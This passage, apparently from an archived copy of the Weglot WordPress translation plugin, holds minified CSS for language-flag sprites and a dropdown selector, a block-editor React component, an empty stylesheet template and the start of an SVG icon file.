!important}.weglot-flags.flag-2.la>a:before,.weglot-flags.flag-2.la>span:before{background-position:-1968px 0 !important}.weglot-flags.flag-2.lv>a:before,.weglot-flags.flag-2.lv>span:before{background-position:-1752px 0 !important}.weglot-flags.flag-2.lt>a:before,.weglot-flags.flag-2.lt>span:before{background-position:-1656px 0 !important}.weglot-flags.flag-2.lb>a:before,.weglot-flags.flag-2.lb>span:before{background-position:-1632px 0 !important}.weglot-flags.flag-2.mk>a:before,.weglot-flags.flag-2.mk>span:before{background-position:-1440px 0 !important}.weglot-flags.flag-2.mg>a:before,.weglot-flags.flag-2.mg>span:before{background-position:-1560px 0 !important}.weglot-flags.flag-2.ms>a:before,.weglot-flags.flag-2.ms>span:before{background-position:-1536px 0 !important}.weglot-flags.flag-2.ml>a:before,.weglot-flags.flag-2.ml>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.mt>a:before,.weglot-flags.flag-2.mt>span:before{background-position:-1200px 0 !important}.weglot-flags.flag-2.mi>a:before,.weglot-flags.flag-2.mi>span:before{background-position:-1224px 0 !important}.weglot-flags.flag-2.mr>a:before,.weglot-flags.flag-2.mr>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.mn>a:before,.weglot-flags.flag-2.mn>span:before{background-position:-4800px 0 !important}.weglot-flags.flag-2.ne>a:before,.weglot-flags.flag-2.ne>span:before{background-position:-1320px 0 !important}.weglot-flags.flag-2.no>a:before,.weglot-flags.flag-2.no>span:before{background-position:-4776px 0 !important}.weglot-flags.flag-2.ps>a:before,.weglot-flags.flag-2.ps>span:before{background-position:-4008px 0 !important}.weglot-flags.flag-2.fa>a:before,.weglot-flags.flag-2.fa>span:before{background-position:-5088px 0 !important}.weglot-flags.flag-2.pl>a:before,.weglot-flags.flag-2.pl>span:before{background-position:-984px 0 !important}.weglot-flags.flag-2.pt>a:before,.weglot-flags.flag-2.pt>span:before{background-position:-528px 0 !important}.weglot-flags.flag-2.pa>a:before,.weglot-flags.flag-2.pa>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.ro>a:before,.weglot-flags.flag-2.ro>span:before{background-position:-960px 0 !important}.weglot-flags.flag-2.ru>a:before,.weglot-flags.flag-2.ru>span:before{background-position:-936px 0 !important}.weglot-flags.flag-2.sm>a:before,.weglot-flags.flag-2.sm>span:before{background-position:-3408px 0 !important}.weglot-flags.flag-2.gd>a:before,.weglot-flags.flag-2.gd>span:before{background-position:-4872px 0 !important}.weglot-flags.flag-2.sr>a:before,.weglot-flags.flag-2.sr>span:before{background-position:-3120px 0 !important}.weglot-flags.flag-2.sn>a:before,.weglot-flags.flag-2.sn>span:before{background-position:-72px 0 !important}.weglot-flags.flag-2.sd>a:before,.weglot-flags.flag-2.sd>span:before{background-position:-1128px 0 !important}.weglot-flags.flag-2.si>a:before,.weglot-flags.flag-2.si>span:before{background-position:-480px 0 !important}.weglot-flags.flag-2.sk>a:before,.weglot-flags.flag-2.sk>span:before{background-position:-4152px 0 !important}.weglot-flags.flag-2.sl>a:before,.weglot-flags.flag-2.sl>span:before{background-position:-696px 0 !important}.weglot-flags.flag-2.so>a:before,.weglot-flags.flag-2.so>span:before{background-position:-3336px 0 !important}.weglot-flags.flag-2.st>a:before,.weglot-flags.flag-2.st>span:before{background-position:-3552px 0 !important}.weglot-flags.flag-2.es>a:before,.weglot-flags.flag-2.es>span:before{background-position:-96px 0 !important}.weglot-flags.flag-2.su>a:before,.weglot-flags.flag-2.su>span:before{background-position:-3312px 0 !important}.weglot-flags.flag-2.sw>a:before,.weglot-flags.flag-2.sw>span:before{background-position:-1872px 0 !important}.weglot-flags.flag-2.sv>a:before,.weglot-flags.flag-2.sv>span:before{background-position:-552px 0 !important}.weglot-flags.flag-2.tl>a:before,.weglot-flags.flag-2.tl>span:before{background-position:-1008px 0 !important}.weglot-flags.flag-2.ty>a:before,.weglot-flags.flag-2.ty>span:before{background-position:-4512px 0 !important}.weglot-flags.flag-2.tg>a:before,.weglot-flags.flag-2.tg>span:before{background-position:-264px 0 !important}.weglot-flags.flag-2.ta>a:before,.weglot-flags.flag-2.ta>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.tt>a:before,.weglot-flags.flag-2.tt>span:before{background-position:-936px 0 !important}.weglot-flags.flag-2.te>a:before,.weglot-flags.flag-2.te>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.th>a:before,.weglot-flags.flag-2.th>span:before{background-position:-456px 0 !important}.weglot-flags.flag-2.to>a:before,.weglot-flags.flag-2.to>span:before{background-position:-3264px 0 !important}.weglot-flags.flag-2.tr>a:before,.weglot-flags.flag-2.tr>span:before{background-position:-360px 0 !important}.weglot-flags.flag-2.uk>a:before,.weglot-flags.flag-2.uk>span:before{background-position:-288px 0 !important}.weglot-flags.flag-2.ur>a:before,.weglot-flags.flag-2.ur>span:before{background-position:-1128px 0 !important}.weglot-flags.flag-2.uz>a:before,.weglot-flags.flag-2.uz>span:before{background-position:-240px 0 !important}.weglot-flags.flag-2.vi>a:before,.weglot-flags.flag-2.vi>span:before{background-position:-144px 0 !important}.weglot-flags.flag-2.cy>a:before,.weglot-flags.flag-2.cy>span:before{background-position:-4848px 0 !important}.weglot-flags.flag-2.fy>a:before,.weglot-flags.flag-2.fy>span:before{background-position:-1296px 0 !important}.weglot-flags.flag-2.xh>a:before,.weglot-flags.flag-2.xh>span:before{background-position:-4968px 0 !important}.weglot-flags.flag-2.yi>a:before,.weglot-flags.flag-2.yi>span:before{background-position:-1992px 0 !important}.weglot-flags.flag-2.yo>a:before,.weglot-flags.flag-2.yo>span:before{background-position:-1103px 0 !important}.weglot-flags.flag-2.zu>a:before,.weglot-flags.flag-2.zu>span:before{background-position:-4968px 0 !important}.weglot-flags.flag-3.hw>a:before,.weglot-flags.flag-3.hw>span:before{background-position:-2711px 0 !important}.weglot-flags.flag-3.fl>a:before,.weglot-flags.flag-3.fl>span:before{background-position:-5232px 0 !important}.weglot-flags.flag-3.af>a:before,.weglot-flags.flag-3.af>span:before{background-position:-5496px 0 !important}.weglot-flags.flag-3.sq>a:before,.weglot-flags.flag-3.sq>span:before{background-position:-4776px 0 !important}.weglot-flags.flag-3.am>a:before,.weglot-flags.flag-3.am>span:before{background-position:-192px 0 !important}.weglot-flags.flag-3.ar>a:before,.weglot-flags.flag-3.ar>span:before{background-position:-3336px 0 !important}.weglot-flags.flag-3.hy>a:before,.weglot-flags.flag-3.hy>span:before{background-position:-4632px 0 !important}.weglot-flags.flag-3.az>a:before,.weglot-flags.flag-3.az>span:before{background-position:-4536px 0 !important}.weglot-flags.flag-3.ba>a:before,.weglot-flags.flag-3.ba>span:before{background-position:-2664px 0 !important}.weglot-flags.flag-3.eu>a:before,.weglot-flags.flag-3.eu>span:before{background-position:-5808px 0 !important}.weglot-flags.flag-3.be>a:before,.weglot-flags.flag-3.be>span:before{background-position:-144px 0 !important}.weglot-flags.flag-3.bn>a:before,.weglot-flags.flag-3.bn>span:before{background-position:-4488px 0 !important}.weglot-flags.flag-3.bs>a:before,.weglot-flags.flag-3.bs>span:before{background-position:-4392px 0 !important}.weglot-flags.flag-3.bg>a:before,.weglot-flags.flag-3.bg>span:before{background-position:-4296px 0 !important}.weglot-flags.flag-3.br>a:before,.weglot-flags.flag-3.br>span:before{background-position:-4344px 0 !important}.weglot-flags.flag-3.my>a:before,.weglot-flags.flag-3.my>span:before{background-position:-3769px 0 !important}.weglot-flags.flag-3.ca>a:before,.weglot-flags.flag-3.ca>span:before{background-position:-5784px 0 !important}.weglot-flags.flag-3.zh>a:before,.weglot-flags.flag-3.zh>span:before{background-position:-3240px 0 !important}.weglot-flags.flag-3.tw>a:before,.weglot-flags.flag-3.tw>span:before{background-position:-4008px 0 !important}.weglot-flags.flag-3.km>a:before,.weglot-flags.flag-3.km>span:before{background-position:-4201px 0 !important}.weglot-flags.flag-3.ny>a:before,.weglot-flags.flag-3.ny>span:before{background-position:-384px 0 !important}.weglot-flags.flag-3.co>a:before,.weglot-flags.flag-3.co>span:before{background-position:-2760px 0 !important}.weglot-flags.flag-3.hr>a:before,.weglot-flags.flag-3.hr>span:before{background-position:-3048px 0 !important}.weglot-flags.flag-3.cs>a:before,.weglot-flags.flag-3.cs>span:before{background-position:-5280px 0 !important}.weglot-flags.flag-3.da>a:before,.weglot-flags.flag-3.da>span:before{background-position:-3024px 0 !important}.weglot-flags.flag-3.nl>a:before,.weglot-flags.flag-3.nl>span:before{background-position:-3360px 0 !important}.weglot-flags.flag-3.en>a:before,.weglot-flags.flag-3.en>span:before{background-position:-2520px 0 !important}.weglot-flags.flag-3.eo>a:before,.weglot-flags.flag-3.eo>span:before{background-position:-2520px 0 !important}.weglot-flags.flag-3.et>a:before,.weglot-flags.flag-3.et>span:before{background-position:-2856px 0 !important}.weglot-flags.flag-3.fj>a:before,.weglot-flags.flag-3.fj>span:before{background-position:-0px 0 !important}.weglot-flags.flag-3.fi>a:before,.weglot-flags.flag-3.fi>span:before{background-position:-2784px 0 !important}.weglot-flags.flag-3.fr>a:before,.weglot-flags.flag-3.fr>span:before{background-position:-2760px 0 !important}.weglot-flags.flag-3.gl>a:before,.weglot-flags.flag-3.gl>span:before{background-position:-5832px 0 !important}.weglot-flags.flag-3.ka>a:before,.weglot-flags.flag-3.ka>span:before{background-position:-1536px 0 !important}.weglot-flags.flag-3.de>a:before,.weglot-flags.flag-3.de>span:before{background-position:-1488px 0 !important}.weglot-flags.flag-3.el>a:before,.weglot-flags.flag-3.el>span:before{background-position:-1416px 0 !important}.weglot-flags.flag-3.gu>a:before,.weglot-flags.flag-3.gu>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.ht>a:before,.weglot-flags.flag-3.ht>span:before{background-position:-5160px 0 !important}.weglot-flags.flag-3.ha>a:before,.weglot-flags.flag-3.ha>span:before{background-position:-361px 0 !important}.weglot-flags.flag-3.he>a:before,.weglot-flags.flag-3.he>span:before{background-position:-1608px 0 !important}.weglot-flags.flag-3.hi>a:before,.weglot-flags.flag-3.hi>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.hu>a:before,.weglot-flags.flag-3.hu>span:before{background-position:-1920px 0 !important}.weglot-flags.flag-3.is>a:before,.weglot-flags.flag-3.is>span:before{background-position:-840px 0 !important}.weglot-flags.flag-3.ig>a:before,.weglot-flags.flag-3.ig>span:before{background-position:-3457px 0 !important}.weglot-flags.flag-3.id>a:before,.weglot-flags.flag-3.id>span:before{background-position:-4992px 0 !important}.weglot-flags.flag-3.ga>a:before,.weglot-flags.flag-3.ga>span:before{background-position:-2016px 0 !important}.weglot-flags.flag-3.it>a:before,.weglot-flags.flag-3.it>span:before{background-position:-336px 0 !important}.weglot-flags.flag-3.ja>a:before,.weglot-flags.flag-3.ja>span:before{background-position:-2448px 0 !important}.weglot-flags.flag-3.jv>a:before,.weglot-flags.flag-3.jv>span:before{background-position:-864px 0 !important}.weglot-flags.flag-3.kn>a:before,.weglot-flags.flag-3.kn>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.kk>a:before,.weglot-flags.flag-3.kk>span:before{background-position:-3912px 0 !important}.weglot-flags.flag-3.ko>a:before,.weglot-flags.flag-3.ko>span:before{background-position:-2256px 0 !important}.weglot-flags.flag-3.ku>a:before,.weglot-flags.flag-3.ku>span:before{background-position:-1920px 0 !important}.weglot-flags.flag-3.ky>a:before,.weglot-flags.flag-3.ky>span:before{background-position:-744px 0 !important}.weglot-flags.flag-3.lo>a:before,.weglot-flags.flag-3.lo>span:before{background-position:-3816px 0 !important}.weglot-flags.flag-3.la>a:before,.weglot-flags.flag-3.la>span:before{background-position:-336px 0 !important}.weglot-flags.flag-3.lv>a:before,.weglot-flags.flag-3.lv>span:before{background-position:-216px 0 !important}.weglot-flags.flag-3.lt>a:before,.weglot-flags.flag-3.lt>span:before{background-position:-1776px 0 !important}.weglot-flags.flag-3.lb>a:before,.weglot-flags.flag-3.lb>span:before{background-position:-1945px 0 !important}.weglot-flags.flag-3.mk>a:before,.weglot-flags.flag-3.mk>span:before{background-position:-2208px 0 !important}.weglot-flags.flag-3.mg>a:before,.weglot-flags.flag-3.mg>span:before{background-position:-5064px 0 !important}.weglot-flags.flag-3.ms>a:before,.weglot-flags.flag-3.ms>span:before{background-position:-864px 0 !important}.weglot-flags.flag-3.ml>a:before,.weglot-flags.flag-3.ml>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.mt>a:before,.weglot-flags.flag-3.mt>span:before{background-position:-4920px 0 !important}.weglot-flags.flag-3.mi>a:before,.weglot-flags.flag-3.mi>span:before{background-position:-2113px 0 !important}.weglot-flags.flag-3.mr>a:before,.weglot-flags.flag-3.mr>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.mn>a:before,.weglot-flags.flag-3.mn>span:before{background-position:-24px 0 !important}.weglot-flags.flag-3.ne>a:before,.weglot-flags.flag-3.ne>span:before{background-position:-5642px 0 !important}.weglot-flags.flag-3.no>a:before,.weglot-flags.flag-3.no>span:before{background-position:-984px 0 !important}.weglot-flags.flag-3.ps>a:before,.weglot-flags.flag-3.ps>span:before{background-position:-4753px 0 !important}.weglot-flags.flag-3.fa>a:before,.weglot-flags.flag-3.fa>span:before{background-position:-816px 0 !important}.weglot-flags.flag-3.pl>a:before,.weglot-flags.flag-3.pl>span:before{background-position:-4944px 0 !important}.weglot-flags.flag-3.pt>a:before,.weglot-flags.flag-3.pt>span:before{background-position:-3504px 0 !important}.weglot-flags.flag-3.pa>a:before,.weglot-flags.flag-3.pa>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.ro>a:before,.weglot-flags.flag-3.ro>span:before{background-position:-3744px 0 !important}.weglot-flags.flag-3.ru>a:before,.weglot-flags.flag-3.ru>span:before{background-position:-2664px 0 !important}.weglot-flags.flag-3.sm>a:before,.weglot-flags.flag-3.sm>span:before{background-position:-1248px 0 !important}.weglot-flags.flag-3.gd>a:before,.weglot-flags.flag-3.gd>span:before{background-position:-3841px 0 !important}.weglot-flags.flag-3.sr>a:before,.weglot-flags.flag-3.sr>span:before{background-position:-3312px 0 !important}.weglot-flags.flag-3.sn>a:before,.weglot-flags.flag-3.sn>span:before{background-position:-5521px 0 !important}.weglot-flags.flag-3.sd>a:before,.weglot-flags.flag-3.sd>span:before{background-position:-1993px 0 !important}.weglot-flags.flag-3.si>a:before,.weglot-flags.flag-3.si>span:before{background-position:-2833px 0 !important}.weglot-flags.flag-3.sk>a:before,.weglot-flags.flag-3.sk>span:before{background-position:-552px 0 !important}.weglot-flags.flag-3.sl>a:before,.weglot-flags.flag-3.sl>span:before{background-position:-936px 0 !important}.weglot-flags.flag-3.so>a:before,.weglot-flags.flag-3.so>span:before{background-position:-4032px 0 !important}.weglot-flags.flag-3.st>a:before,.weglot-flags.flag-3.st>span:before{background-position:-3961px 0 !important}.weglot-flags.flag-3.es>a:before,.weglot-flags.flag-3.es>span:before{background-position:-3576px 0 !important}.weglot-flags.flag-3.su>a:before,.weglot-flags.flag-3.su>span:before{background-position:-3985px 0 !important}.weglot-flags.flag-3.sw>a:before,.weglot-flags.flag-3.sw>span:before{background-position:-912px 0 !important}.weglot-flags.flag-3.sv>a:before,.weglot-flags.flag-3.sv>span:before{background-position:-264px 0 !important}.weglot-flags.flag-3.tl>a:before,.weglot-flags.flag-3.tl>span:before{background-position:-5232px 0 !important}.weglot-flags.flag-3.ty>a:before,.weglot-flags.flag-3.ty>span:before{background-position:-1512px 0 !important}.weglot-flags.flag-3.tg>a:before,.weglot-flags.flag-3.tg>span:before{background-position:-3720px 0 !important}.weglot-flags.flag-3.ta>a:before,.weglot-flags.flag-3.ta>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.tt>a:before,.weglot-flags.flag-3.tt>span:before{background-position:-2664px 0 !important}.weglot-flags.flag-3.te>a:before,.weglot-flags.flag-3.te>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.th>a:before,.weglot-flags.flag-3.th>span:before{background-position:-4848px 0 !important}.weglot-flags.flag-3.to>a:before,.weglot-flags.flag-3.to>span:before{background-position:-1680px 0 !important}.weglot-flags.flag-3.tr>a:before,.weglot-flags.flag-3.tr>span:before{background-position:-432px 0 !important}.weglot-flags.flag-3.uk>a:before,.weglot-flags.flag-3.uk>span:before{background-position:-5736px 0 !important}.weglot-flags.flag-3.ur>a:before,.weglot-flags.flag-3.ur>span:before{background-position:-1992px 0 !important}.weglot-flags.flag-3.uz>a:before,.weglot-flags.flag-3.uz>span:before{background-position:-2160px 0 !important}.weglot-flags.flag-3.vi>a:before,.weglot-flags.flag-3.vi>span:before{background-position:-3384px 0 !important}.weglot-flags.flag-3.cy>a:before,.weglot-flags.flag-3.cy>span:before{background-position:-5040px 0 !important}.weglot-flags.flag-3.fy>a:before,.weglot-flags.flag-3.fy>span:before{background-position:-3360px 0 !important}.weglot-flags.flag-3.xh>a:before,.weglot-flags.flag-3.xh>span:before{background-position:-5496px 0 !important}.weglot-flags.flag-3.yi>a:before,.weglot-flags.flag-3.yi>span:before{background-position:-1608px 0 !important}.weglot-flags.flag-3.yo>a:before,.weglot-flags.flag-3.yo>span:before{background-position:-3457px 0 !important}.weglot-flags.flag-3.zu>a:before,.weglot-flags.flag-3.zu>span:before{background-position:-5496px 0 !important}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags a.mega-menu-link:before{background-image:url("../../../app/images/rect_mate.png") !important;background-size:auto 20px !important;border-radius:0px !important;width:30px !important;height:20px !important;content:"";vertical-align:middle;margin-right:10px;display:inline-block;overflow:hidden}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-1 .mega-menu-link:before{background-image:url("../../../app/images/rect_bright.png") !important}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-2 .mega-menu-link:before{background-image:url("../../../app/images/square_flag.png") !important;width:24px !important;height:24px !important;background-size:auto 24px !important}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-3 .mega-menu-link:before{background-image:url("../../../app/images/circular_flag.png") !important;width:24px !important;height:24px !important;background-size:auto 24px !important}#wp-admin-bar-weglot>.ab-item{background-image:url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMDAiIGhlaWdodD0iMzAwIj48ZyBmaWxsPSIjYTBhNWFhIj48cGF0aCBkPSJNMjEuNzM5IDkyLjU2NWw1MS44MjggMTI5LjczMiAyMy42Ni02MC4yNzkgMjQuMTQ0IDYwLjI3OUwxNzMuMiA5Mi41NjVoLTI4LjAwN2wtMjMuODIyIDU4Ljc1LTIzLjkwMi01OC43NS0yMy45MDIgNTguNzUtMjMuOTAyLTU4Ljc1SDIxLjczOXoiLz48cGF0aCBkPSJNMjEwLjAwNiA5Mi43MWMtMTcuODY2IDAtMzMuMTU3IDYuMzU4LTQ1Ljg3MyAxOS4wNzQtMTIuNzE1IDEyLjcxNi0xOC45OTMgMjguMDA2LTE4Ljk5MyA0NS43OTIgMCAxNy44NjcgNi4yNzggMzMuMTU4IDE4Ljk5MyA0NS44NzMgMTIuNzE2IDEyLjcxNiAyOC4wMDcgMTguOTkzIDQ1Ljg3MyAxOC45OTMgMTcuNzg2IDAgMzMuMDc3LTYuMjc3IDQ1Ljc5My0xOC45OTMgMTIuNzE1LTEyLjcxNSAxOS4wNzMtMjguMDA2IDE5LjA3My00NS44NzMgMC00LjUwNy0uNDgzLTguODUyLTEuMjg4LTEyLjk1N2gtNjMuNTc4djI1LjkxNGgzNi42OTljLTIuNzM3IDcuNTY1LTcuNDg1IDEzLjg0My0xNC4wODQgMTguNjcxLTYuNjggNC44My0xNC4yNDUgNy4yNDQtMjIuNjE1IDcuMjQ0LTEwLjc4NCAwLTE5Ljk1OC0zLjc4My0yNy41MjMtMTEuMzQ4LTcuNTY2LTcuNTY1LTExLjM0OC0xNi43NC0xMS4zNDgtMjcuNTI0IDAtMTAuNjIzIDMuNzgyLTE5Ljc5OCAxMS4zNDgtMjcuNDQzIDcuNTY1LTcuNjQ1IDE2Ljc0LTExLjUwOCAyNy41MjMtMTEuNTA4IDEwLjYyMyAwIDE5Ljc5OCAzLjg2MyAyNy41MjQgMTEuNDI4bDE4LjM1LTE4LjM1YTY3Ljk2MyA2Ny45NjMgMCAwMC0yMC43NjQtMTMuODQyYy03Ljg4Ny0zLjM4LTE2LjI1Ny01LjE1LTI1LjExLTUuMTV6Ii8+PC9nPjwvc3ZnPg==") !important;-webkit-background-size:22px auto !important;background-size:22px auto !important;background-repeat:no-repeat !important;background-position:4px 5px !important;padding-left:30px !important}li.weglot-hide,.weglot-hide{display:none !important}.country-selector{z-index:9999;text-align:left;position:relative;display:inline-block;width:auto}.country-selector a{padding:0 10px;outline:none;text-decoration:none;float:none !important;white-space:nowrap;font-weight:normal;cursor:pointer;color:black;-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.country-selector a:focus{outline:none}.country-selector ul{padding:0px;z-index:1010;list-style:none;margin:0}.country-selector li{margin:0px;padding:0px}.country-selector.weglot-dropdown{background-color:white}.country-selector.weglot-dropdown a,.country-selector.weglot-dropdown span{display:block;height:37px;line-height:36px;font-size:13px;padding:0 10px;width:100%;-webkit-box-sizing:border-box;box-sizing:border-box;font-weight:normal}.country-selector.weglot-dropdown a:hover,.country-selector.weglot-dropdown span:hover{cursor:pointer}.country-selector.weglot-dropdown .wgcurrent{border:1px solid #e0e0e0;list-style:none;display:block;margin:0}.country-selector.weglot-dropdown .wgcurrent a,.country-selector.weglot-dropdown .wgcurrent span{padding-right:60px}.country-selector.weglot-dropdown .wgcurrent:after{display:inline-block;position:absolute;top:17px;right:8px;width:13px;height:7px;-ms-interpolation-mode:nearest-neighbor;image-rendering:-webkit-optimize-contrast;image-rendering:-moz-crisp-edges;image-rendering:-o-pixelated;image-rendering:pixelated;background:url("../../../app/images/wgarrowdown.png") no-repeat;content:"";-webkit-transition:all 200ms;-o-transition:all 200ms;transition:all 200ms;-webkit-transform:rotate(-90deg);-ms-transform:rotate(-90deg);transform:rotate(-90deg)}.country-selector.weglot-dropdown ul{position:absolute;min-width:100%;border:1px solid #ebeef0;background:white;left:0;top:initial;-webkit-box-sizing:border-box;box-sizing:border-box;display:none;padding:0}.country-selector.weglot-dropdown input:checked ~ ul{display:block}.country-selector.weglot-dropdown input:checked ~ .wgcurrent:after{-webkit-transform:rotate(0deg);-ms-transform:rotate(0deg);transform:rotate(0deg)}.country-selector.weglot-dropdown li{width:100%}.country-selector.weglot-dropdown.weglot-invert ul{bottom:38px}.country-selector.weglot-dropdown.weglot-invert input:checked ~ .wgcurrent:after{-webkit-transform:rotate(-180deg);-ms-transform:rotate(-180deg);transform:rotate(-180deg)}.country-selector.weglot-default{position:fixed;bottom:0px;right:40px}.country-selector.weglot-inline a:hover{text-decoration:underline;color:#00a0d2}.country-selector.weglot-inline .wgcurrent a{text-decoration:underline}.country-selector.weglot-inline label{margin-bottom:0;display:inline-block;vertical-align:middle}.country-selector.weglot-inline ul{display:inline-block;vertical-align:middle}.country-selector.weglot-inline li{line-height:1 !important;display:inline-block;margin:2px 0px;vertical-align:middle}.country-selector.weglot-inline.weglot-default{bottom:5px}.country-selector input{display:none !important}.navbar .navbar-nav li.weglot-flags a.weglot-lang:before{position:static;-webkit-transform:none;-ms-transform:none;transform:none;-webkit-transition:none;-o-transition:none;transition:none}.js .main-navigation .country-selector ul{display:none}html[dir="rtl"] .weglot-flags a:before,html[dir="rtl"] .weglot-flags span:before{margin-right:0;margin-left:10px}.weglot-flags>a:before,.weglot-flags>span.wglanguage-name:before{background-image:url("../../../app/images/rect_mate.png");-webkit-background-size:auto 20px !important;background-size:auto 20px !important;border-radius:0px !important;width:30px !important;height:20px !important;content:"";vertical-align:middle;margin-right:10px;display:inline-block;overflow:hidden}.weglot-flags.flag-1>a:before,.weglot-flags.flag-1>span:before{background-image:url("../../../app/images/rect_bright.png")}.weglot-flags.flag-2>a:before,.weglot-flags.flag-2>span:before{background-image:url("../../../app/images/square_flag.png");width:24px !important;height:24px !important;-webkit-background-size:auto 24px !important;background-size:auto 24px !important}.weglot-flags.flag-3 a:before,.weglot-flags.flag-3 span:before{background-image:url("../../../app/images/circular_flag.png");width:24px !important;height:24px !important;-webkit-background-size:auto 24px !important;background-size:auto 24px !important}.weglot-flags>a span:before{background-image:none !important;display:none !important}.weglot-flags>span a:before{background-image:none !important;display:none !important}
weglot-menu/src/edit.js000064400000002431151330373270011065 0ustar00/**
 * Retrieves the translation of text.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-i18n/
 */
import {__} from '@wordpress/i18n';

/**
 * React hook that is used to mark the block wrapper element.
 * It provides all the necessary props like the class name.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-block-editor/#useBlockProps
 */
import {useBlockProps} from '@wordpress/block-editor';
import ServerSideRender from '@wordpress/server-side-render';

/**
 * Lets webpack process CSS, SASS or SCSS files referenced in JavaScript files.
 * Those files can contain any CSS code that gets applied to the editor.
 *
 * @see https://www.npmjs.com/package/@wordpress/scripts#using-css
 */
import './editor.scss';

/**
 * The edit function describes the structure of your block in the context of the
 * editor. This represents what the editor will render when the block is used.
 *
 * @see https://developer.wordpress.org/block-editor/developers/block-api/block-edit-save/#edit
 *
 * @return {WPElement} Element to render.
 */
export default function Edit(props) {
	const blockProps = useBlockProps();
	return (
		<div {...blockProps}>
			<ServerSideRender
				block="create-block/weglot-widget"
				attributes={props.attributes}
			/>
		</div>
	);
}
weglot-menu/src/style.scss000064400000000250151330373270011634 0ustar00/**
 * The following styles get applied both on the front of your site
 * and in the editor.
 *
 * Replace them with your own styles or remove the file completely.
 */
weglot-menu/src/icons.js000064400000007124151330373270011257 0ustar00const icons = {};

icons.weglot = <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
	<path d="M12.9831 0.0472697L13.4682 0.0945448L13.9462 0.164576L14.4172 0.250364L14.8829 0.355413L15.3417 0.477971L15.7916 0.618033L16.2346 0.775604L16.6706 0.950685L17.0961 1.14152L17.5146 1.34811L17.9208 1.56872L18.32 1.80508L18.7087 2.05719L19.0851 2.32331L19.4528 2.60344L19.803 2.89758L20.1532 3.20397L20.4859 3.52261L20.8046 3.85352L21.111 4.20368L21.4051 4.55384L21.6853 4.9215L21.9514 5.29793L22.2018 5.68661L22.4399 6.08404L22.6605 6.49197L22.8672 6.90867L23.0563 7.33586L23.2314 7.77006L23.3872 8.21302L23.529 8.66472L23.6516 9.12168L23.7566 9.5874L23.8424 10.0601L23.9107 10.5381L23.9597 11.0213L23.9895 11.5115L24 12.0053L23.9895 12.5007L23.9597 12.9892L23.9107 13.4724L23.8424 13.9521L23.7566 14.4231L23.6516 14.8888L23.529 15.3458L23.3872 15.7975L23.2314 16.2404L23.0563 16.6764L22.8672 17.1018L22.6605 17.5185L22.4399 17.9265L22.2018 18.3256L21.9514 18.7126L21.6853 19.089L21.4051 19.4567L21.111 19.8068L20.8046 20.157L20.4859 20.4896L20.1532 20.8083L19.803 21.1147L19.4528 21.4071L19.0851 21.6872L18.7087 21.9533L18.32 22.2037L17.9208 22.44L17.5146 22.6624L17.0961 22.8637L16.6706 23.0546L16.2346 23.2296L15.7916 23.3872L15.3417 23.5273L14.8829 23.6498L14.4172 23.7549L13.9462 23.8424L13.4682 23.9107L12.9831 23.9597L12.4946 23.9895L11.9991 24L11.5054 23.9895L11.0151 23.9597L10.5318 23.9142L10.0538 23.8459L9.58109 23.7584L9.1171 23.6533L8.65835 23.5308L8.20311 23.389L7.75837 23.2314L7.32415 23.0563L6.90392 22.8637L6.48545 22.6589L6.07748 22.4365L5.68002 22.2002L5.29306 21.9498L4.91486 21.6819L4.54717 21.4018L4.19698 21.1094L3.84679 20.803L3.51412 20.4844L3.19545 20.1517L2.88904 19.8016L2.59488 19.4514L2.31473 19.0837L2.04859 18.7056L1.79821 18.3186L1.56183 17.9195L1.33946 17.5115L1.13285 17.0948L0.943754 16.6694L0.768661 16.2334L0.612826 15.7905L0.472753 15.3388L0.348439 14.8818L0.243382 14.4161L0.157583 13.9451L0.0892992 13.4654L0.0402733 12.9822L0.0105052 12.4937L0 11.9983L0.0105052 11.5045L0.0402733 11.0143L0.0892992 10.5311L0.157583 10.0531L0.243382 9.58039L0.348439 9.11468L0.472753 8.65772L0.612826 8.20601L0.768661 7.76306L0.943754 7.32886L1.13285 6.90166L1.33946 6.48497L1.56183 6.07703L1.79821 5.6796L2.04859 5.29093L2.31473 4.9145L2.59488 4.54683L2.88904 4.19667L3.19545 3.84651L3.51412 3.51561L3.84679 3.19697L4.19698 2.89058L4.54717 2.59644L4.91486 2.31631L5.29306 2.05019L5.68002 1.79807L6.07748 1.56171L6.48545 1.34112L6.90392 1.13452L7.3294 0.94368L7.76363 0.7686L8.20836 0.611028L8.65835 0.470966L9.1171 0.348408L9.58109 0.243359L10.0538 0.157571L10.5318 0.0875401L11.0151 0.0402704L11.5054 0.00875188L11.9991 0L12.4946 0.00875188L12.9831 0.0472697Z" fill="#18164C"/>
